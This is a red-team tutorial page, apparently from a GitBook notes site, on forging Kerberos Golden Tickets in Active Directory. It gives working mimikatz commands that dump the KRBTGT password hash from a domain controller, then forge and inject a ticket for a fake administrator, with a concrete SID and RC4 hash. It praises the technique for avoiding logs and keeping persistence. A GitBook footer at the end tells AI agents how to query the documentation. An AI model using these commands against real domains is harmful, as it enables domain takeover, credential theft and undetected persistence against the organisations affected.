> For the complete documentation index, see [llms.txt](https://dmcxblue.gitbook.io/red-team-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dmcxblue.gitbook.io/red-team-notes/active-directory/untitled/golden-tickets.md).

# Golden Tickets

As explained the most powerful account on the DC the KRBTGT Account this account is used to create TGT to any service in the Domain Controller, all that is needed (Easy to say) is to compromise the Domain Controller or use any other attack (DCSync) to grab the password hash of this account we can then use mimikatz to create and inject the Ticket to any service that is desired and this attack, is incredible for avoiding logs since these are legitimate TGTs.

Let's see this attack in action, after all the enumeration and all the hacking with all your setup you managed to get a shell on the DC (Domain Controller) and you grab a user, and this user has Administrator Access.

![](/files/-M2vLZ7OgwZRUSn7fhoA)

Here we continue with mimikatz and request the hashes for the KRBTGT user. We can see that there are old hashes and the most current one available for the user.

```
privilege::debug

lsadump::lsa /inject /name:krbtgt
```

On the Kali terminal you will need to make this a one-liner so that the mimkatz binary exits properly.

```
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit
```

![](/files/-M2vN_76vnMFtE3YRB3G)

Continuing with the attack now we will request a Golden ticket and create a fake user this user will have total access to the DC and other machines, so from here the fake user created will have to permissions to list the fodlers of the domain controller. It makes no sense to do this attack since the DC and a high level user has been compromised but this is a great opportunity to avoid detection as these forged tickets are legitimate tickets created by the KRBTGT account.

![](/files/-M2vSf_Uapxf3JkAYc6N)

```
One-Liner

mimikatz.exe "kerberos::golden /domain:dc1.dominioncyber.local /sid:S-1-5-21-4198639423-1025486511-2226459690 /rc4:a8bbd83cc1ded03f7db3b07d78e95036 /user:Youllnevercatchme /id:500 /ptt"
```

Let's confirm our assumptions.

![](/files/-M2vcGtlp7-Dnv-OwYwm)

We can list the DC directories and the user was authenticated to it as well, the Ticket is saved in the session and with mimikatz I used the `msic::cmd`command to prompt open a new cmd window with the session in  memory this is also a great way to Privesc or to Maintain Persistence on a machine.

{% hint style="info" %}
Recommended to have an RDP Session as for the new cm window will not be shown from the Atacker machine
{% endhint %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://dmcxblue.gitbook.io/red-team-notes/active-directory/untitled/golden-tickets.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
